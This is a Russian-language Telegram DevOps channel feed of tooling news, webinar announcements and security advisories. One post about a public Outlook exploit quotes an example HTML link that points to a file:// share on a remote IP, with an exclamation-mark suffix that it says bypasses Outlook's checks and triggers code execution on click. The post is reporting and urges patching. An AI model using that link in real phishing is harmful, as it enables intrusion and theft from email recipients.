KazDevOps – Telegram
KazDevOps
5.38K subscribers
1.3K photos
27 videos
19 files
1.3K links
Канал о DevOps во всех проявлениях: K8s, CI/CD, AppSec, AI/ML, Cloud, Linux
Поможем с DevOps: https://core247.kz/
По рекламе @UlKonovalova
Download Telegram
🔥 Платформа управления секретами

Infisical позволяет синхронизировать секреты в вашей команде/инфраструктуре и предотвратите утечку секретов.

Удобная панель управления секретами в разных проектах и средах (например, разработка, продакшен и т. д.).
Клиентские SDK для получения секретов приложений и инфраструктуры по требованию.
Infisical CLI для получения и внедрения секретов в любой фреймворк в локальной разработке и CI/CD.
Infisical API для выполнения CRUD-операций над секретами, пользователями, проектами и любыми другими ресурсами в Infisical.
Встроенные интеграции с GitHub, Vercel, AWS, Terraform, Ansible и др.
Оператор Infisical Kubernetes для управления секретами в k8s, автоматической перезагрузки развертываний и т. д.

Этим контентом поделился наш подписчик. Не забывайте делиться своими наработками, новостями или другим 🤝

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1333👍3👾2
☄️ InfraStack разрабатывает платформу наблюдения с ИИ, которая позволяет разработчикам самостоятельно наблюдать, устранять неполадки и декодировать сложные стеки продвинутых облачных приложений.

😱 Компания обещает снизить зависимость разработчиков от SRE-инженеров, DevOps и экспертов по инфраструктуре. А всё потому, что компания полагает: сегодняшние инструменты наблюдения не предназначены для разработчиков.

Информационные панели сложны, перегружены и предоставляют некоррелированную визуализацию данных. А еще требуют 100% участия человека 😃

Что думаете по этому поводу? Пишите в комменты 👇🏼

#devops #sre #observability

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🤡9🔥622👾2
☄️ Как мониторить AWS RDS с помощью Prometheus

Задача — настроить оповещение в Slack о нагрузках базы данных. Арман Нургалиев, эксперт и Cloud Architect в Core 24/7 не нашел идеального ответа, как это сделать с помощью стандартных инструментов.

Поэтому он нашел собственное решение и описал инструкцию в статье.

👉 Читайте подробнее, ставьте лайки и делитесь с коллегами

#slack #cloud #awsrds #prometheus #aws

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥115👍42🤡2
🔥 Видео-практикум по проекту DevOps: создаем конвейер CI/CD для Kubernetes с помощью Jenkins

👉 Смотрите здесь. 3,5 тысячи лайков, между прочим

Вас проведут через полную настройку конвейера, подробно описав каждый шаг:

установка и настройка Jenkins с TLS для безопасной связи
установка и настройка Sonarqube с TLS для статического анализа кода и проверок качества
создание и отправка контейнеров Docker в Docker Hub, используя возможности контейнеризации для беспрепятственного развертывания
использование ArgoCD для непрерывного развертывания образа Docker

По традиции предлагаем использовать Яндекс Браузер со встроенным синхронным переводчиком.

#devops #kubernetes #jenkins #cicd #docker

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥75👍53
28 февраля, Ср
Вебинар «Как выбрать IT-инфраструктуру для e-commerce: кейс Uzum Nasiya»

Приглашаем на бесплатный вебинар, посвященный выбору IT-инфраструктуры для e-commerce проектов. Суннат Шамуратов, директор по развитию бизнеса Servercore, расскажет, как решать задачи рынка онлайн-коммерции с помощью продуктов облачной платформы.

Приглашенный спикер Сардорбек Байахмедов, руководитель проектного офиса Uzum Nasiya, поделится опытом миграции IT-инфраструктуры в облако Servercore.

В программе:

— Тренды рынка 2024 и ключевые цифры e-commerce.
— Какие бизнес-задачи стоят перед проектами онлайн-коммерции.
— IT-инфраструктура для решения задач в электронной коммерции.
— Кейс компании Uzum Nasiya: как компания целиком перенесла IT-инфраструктуру в Servercore за 1 месяц.

🔺 Новые участники получат 15 000 тенге для тестирования сервисов.

Регистрируйтесь на вебинар по ссылке.
👍42👎2🔥2
🔥 Присоединяйтесь к онлайн-вебинару на тему Golang: Механизмы синхронизации и микросервисная архитектура

Спикер вебинара — опытный Golang-разработчик Алексей.

🙋🏼‍♂️Алексей не просто пишет код, а создаёт настоящие произведения искусства. У него за плечами множество проектов, включая микросервисные решения, цифровой тенге и блокчейн.

В программе вебинара:

🔸 Введение в многопоточность Golang
🔹 Механизмы синхронизации го-рутин на практике
🔸 Работа с микросервисами
🔹 Возможность задать вопросы опытному разработчику

👉 Подключайтесь в пятницу, 23 февраля, в 19:00 по Астане
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥62
☄️ Полная версия Kubernetes CKS доступна на YouTube.

Есть и теория, и практика, но экзамен придется сдавать отдельно.

Также для тех, кто не выиграл в прошлом конкурсе, могут пригодятся скидочки 50% от Linux Foundation.

👉 Забирайте здесь и делитесь с коллегами

#kubernetes #cks #k8s #devops

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥6👾4🤡2
This media is not supported in your browser
VIEW IN TELEGRAM
Понедельник начинается не с кофе 🤣

А если серьезно — многие считают, что Kubernetes сложен из-за экосистемы интегрируемых инструментов, но на деле — благодаря этому он и полезен.

Поделитесь в комментах, какую интеграцию в Kubernetes вы считаете самой эффективной 👇🏼

@DevOpsKaz
👍9🤣74🔥2👾2
🔥 VMware просит администраторов как можно скорее удалить EAP

Компания VMware призвала администраторов удалить устаревший аутентификационный плагин VMware Enhanced Authentication Plug-in (EAP). Он подвержен атакам типа authentication relay, а также перехвату сессий из-за двух неисправленных уязвимостей.

«Злоумышленник может вынудить пользователя домена с установленным в браузере EAP запрашивать и передавать сервисные билеты для произвольных Active Directory Service Principal Names (SPN). Также атакующий с непривилегированным локальным доступом может перехватить привилегированный сеанс EAP».


Чтобы удалить или отключить EAP, нужно выполнить ряд PowerShell-команд — вот инструкция.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍92🔥2👾2
☄️ Postgres Playground — игровая площадка для обучения PostgreSQL. Руководства сфокусированы на практике и примерах, а не на академических определениях.

Они упрощают задачу, шаг за шагом помогая выполнить упражнения, предоставляя наборы данных, примеры команд и терминал, где можно проверить результат.

Пользуйтесь и делитесь с коллегами 🤝

#devops #postgresql #sql #database #db

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍733👾2
☄️ Стратегии Cloud Migration

1️⃣Rehosting
Многие новые проекты стараются с самого начала использовать облачные технологии, но когда бизнес требует быстрой миграции большого количества приложений, организации предпочитают переносить их как есть. Например, компания GE Oil & Gas, выявила, что даже без внедрения каких-либо облачных оптимизаций она может сэкономить около 30% своих затрат за счет рехостинга.

2️⃣ Replatforming
Вы можете сделать несколько облачных оптимизаций, чтобы получить выгоду, но в остальном вы не меняете основную архитектуру приложения. Например, вы хотите сократить количество времени, которое тратите на управление экземплярами баз данных.

🔤 Repurchasing
Чаще всего мы видим (repurchasing) как переход на SaaS платформу. Переход CRM на Salesforce.com, HR-системы на Workday, CMS на Drupal и так далее.

4️⃣ Refactoring / Re-architecting
Переосмысление архитектуры и разработки приложения, как правило, с использованием нативных облачных (cloud-native) функций. Вызвано потребностью бизнеса в добавлении новых функций, масштабировании или увеличении производительности.

5️⃣ Retire
До 20% корпоративного портфеля приложений больше не используются и их можно просто отключить. Такая экономия может повысить эффективность бизнеса, направив высвободившиеся бюджет другим командам.

6️⃣ Retain
Обычно это означает «пересмотреть» или ничего не делать (пока что). Вы должны переносить только то, что имеет смысл для бизнеса.

🚩 Компания Core 24/7 может помочь с миграцией в облако или оценить, что она вам не нужна — мы подберем решение, которое поможет бизнесу, и перевезем инфраструктуру максимально эффективно.

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥52👾2
☄️ Отчет о затратах на Kubernetes за 2023 год

Узнайте о тенденциях оптимизации затрат Kubernetes, устраните разрыв между выделением ресурсов и фактическим использованием ЦП/памяти в 4 000 кластерах и получите практические советы, как избежать излишних затрат.

👉 Отчёт основан на анализе 4 000 кластеров, работающих на AWS, Azure и GCP с 1 января по 31 декабря 2023 года до их оптимизации.

#devops #aws #k8s #kubernetes #azure #gcp

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍74🔥3
Forwarded from Делаем IT
Большая онлайн-встреча с лидерами веб и мобильного рынка пройдет уже сегодня🔖

Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.

Подключайтесь в 18:00 по ссылке 🔗

Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro

Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥322
Публичный эксплойт на критическую уязвимость Microsoft Outlook

Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!

Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.

Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
🔥9👍63
☄️ Список ресурсов по безопасности CI/CD

👉 Что есть в репозитории:

Риски CI/CD, ошибки конфигурации, статьи про их эксплуатацию и т.д.
Безопасность GitLab CI, Jenkins, GitHub Actions
ArgoCD и настройки в защищенном исполнении
Наборы видеоматериалов
Репозитории с полезными материалами и playground
Примеры реализованных атак на CI/CD

#cicd #devops #gitlab #jenkins

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥54👍43👾2
Фреймворк для создания сетевых сервисов

Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность.

Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию.

#devops #rust

@DevOpsKaz
👍43🔥2🤡2👾2
🛡 Защита API — узнайте, как повысить безопасность с помощью подробного руководства

👉 В статье вы узнаете про:

Целенаправленное использование JWT
Механизмы безопасного хранения
Заявление об использовании токена
Управление временными метками
Безопасное использование алгоритмов при разработке API
Подписание и проверка
Безопасное управление ключами
Использование хранилищ ключей

Пользуйтесь и делитесь с коллегами 🤝

#devsecops #devops #api #apisecurity

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥322👾2
🔥 Как устроен тренажер подготовки к экзамену CKS и CKA(D)

В феврале мы писали про платформу обучения SRE, которая поможет подготовиться к экзаменам CKA, CKS и CKAD. Вам зашло!

👉 Сегодня делимся видеоподкастом, где люди, причастные к платформе, обсуждают, как и чем она живет и много всего интересного:

Стоит ли брать курс от Linux Foundation для подготовки к CKS
Как проходит сам экзамен CKS
Что из себя представляет платформа
Откуда берутся сценарии для заданий
Как проходит проверка заданий
Важное обновление экзаменов Kubernetes
Сколько стоит запустить МОК-экзамен

👉 Ссылка на платформу

#devops #cka #cks #ckad #kubernetes #aws #eks

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥422👾2
☁️ VK Cloud Meetup: Облачные технологии

Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде.

🎙 Арман Нургалиев Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform.

🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering.

🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса.

🚀 Приглашаем всех заинтересованных присоединиться к обсуждению и обмену опытом!

Формат митапа — оффлайн, но также будет онлайн-трансляция.

🗓 Дата: 14 марта (четверг) 2024
🕰 Начало: 17:00
📍 Место: Most IT Hub, Ходжанова, 2/2

👉 Регистрируйтесь здесь

Ждем вас на митапе!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍54🔥42
🔥 Релиз Grafana 10.4

Улучшили Grafana Alerting, обновили визуализацию, внедрили новый плагин и многое другое.

Например, теперь есть инструмент предварительного просмотра миграции оповещений в Grafana Alerting — можно просматривать, редактировать и удалять перенесенные правила перед переключением. Также упростили маршрутизацию уведомлений.

Новый плагин позволяет пользователям напрямую запрашивать и визуализировать данные из SurrealDB в Grafana.

👉 Посмотрите весь список обновлений

🚩 Еще разработчики сообщили о прекращении поддержки AngularJS в Grafana — и рассказали как подготовиттся.

А для тех, кто еще не пользовался Grafana, предлагаем глянуть мастер-класс Grafana as code — может, захотите попробовать 😜

#devops #grafana

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥522👍2👾2
Servercore открывает новую зону доступности в Ташкенте

Servercore — провайдер IT-инфраструктуры с зонами доступности в Ташкенте и Алматы. Среди клиентов — Uzum Nasiya, Alif, Samarkand Air и HWG Sababa.

Клиентам провайдера стала доступна новая зона доступности в Ташкенте. Размещение в двух объединенных общей сетью пулах позволит:
— увеличить отказоустойчивость IT-систем и сервисов,
— повысить уровень безопасности хранения данных,
— снизить задержку при обслуживании конечных пользователей.

В новой зоне доступности для клиентов Servercore стали доступны:
— облачные серверы в пуле UZ-2 на базе AMD EPYC 7713 Milan,
— выделенные серверы в TAS-2 на базе процессоров Intel Xeon E-2236, Intel Xeon W-2255 и Intel Xeon Silver 4214R.

Безопасность и надежность новой зоны доступности подтверждена международным стандартом по информационной безопасности ISO 27001. Все сервисы Servercore соответствуют международному стандарту безопасности данных PCI DSS.

Переходите на сайт, чтобы узнать больше
👍8🔥5👾3🤣2